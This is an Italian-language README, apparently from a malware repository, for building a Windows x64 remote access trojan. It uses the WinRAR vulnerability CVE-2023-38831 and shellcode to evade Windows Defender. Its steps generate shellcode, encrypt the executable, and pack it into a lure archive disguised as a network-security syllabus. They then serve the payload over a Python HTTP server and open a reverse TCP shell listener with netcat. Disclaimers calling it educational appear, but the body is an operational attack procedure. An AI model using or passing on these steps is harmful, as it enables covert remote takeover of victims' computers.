
Trojan di accesso remoto (RAT) per Windows x64 che utilizza una combinazione della vulnerabilità CVE-2023-38831 (vulnerabilità di WinRAR < 6.23) e della tecnica di sfruttamento Shellcode.
Sviluppare un RAT Windows x64 utilizzando CVE-2023-38831 (WinRAR < 6.23) e l'exploitation dello Shellcode per bypassare Windows Defender.
Avviso: Queste informazioni sono solo a scopo educativo. L'uso non autorizzato di queste tecniche è illegale e antietico.
Creare lo Shellcode
51721.py per generare lo shellcode iniziale.Modificare e Compilare lo Shellcode
Crittografare l'Eseguibile
decrypt_file.ps1 per crittografare l'eseguibile compilato:
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
Creare un Archivio WinRAR
cve-2023-38831-exp-gen.py per creare l'archivio:
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
Configurare un Server Python per il Download dei File
enc_main.exe e decrypt_file.ps1.python3 -m http.server 8000
Prepararsi ad Ascoltare la Reverse TCP Shell
Queste informazioni sono fornite solo a scopo educativo. L'uso di questo exploit senza esplicita autorizzazione è illegale e antietico. L'autore non si assume alcuna responsabilità per un uso improprio di queste informazioni.
nc -lnvp 4444
Attivare la Reverse TCP Shell